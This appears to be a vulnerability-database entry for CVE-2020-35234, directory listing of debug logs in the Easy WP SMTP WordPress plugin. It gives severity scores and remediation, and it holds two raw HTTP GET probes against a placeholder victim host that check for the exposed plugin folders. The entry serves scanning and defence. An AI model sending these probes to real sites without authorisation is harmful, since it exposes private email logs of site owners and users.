| Title | SMTP WP Plugin Directory Listing |
|---|---|
| Author | PR3R00T |
| Severity | High |
| Impact | Low: Information disclosure |
| Remediation | Upgrade to version 1.4.3 or newer and consider disabling debug logs. |
| CVSS Score | 7.5 |
| EPSS Score | 0.77656 |
| CVE ID | CVE-2020-35234 |
| CWE ID | CWE-532 |
| Tags | cve2020 cve wordpress wp-plugin smtp wp-ecommerce vkev vuln |
The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
GET /wp-content/plugins/easy-wp-smtp/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-content/plugins/wp-mail-smtp-pro/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35234.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-35234.pcap
N/AN/A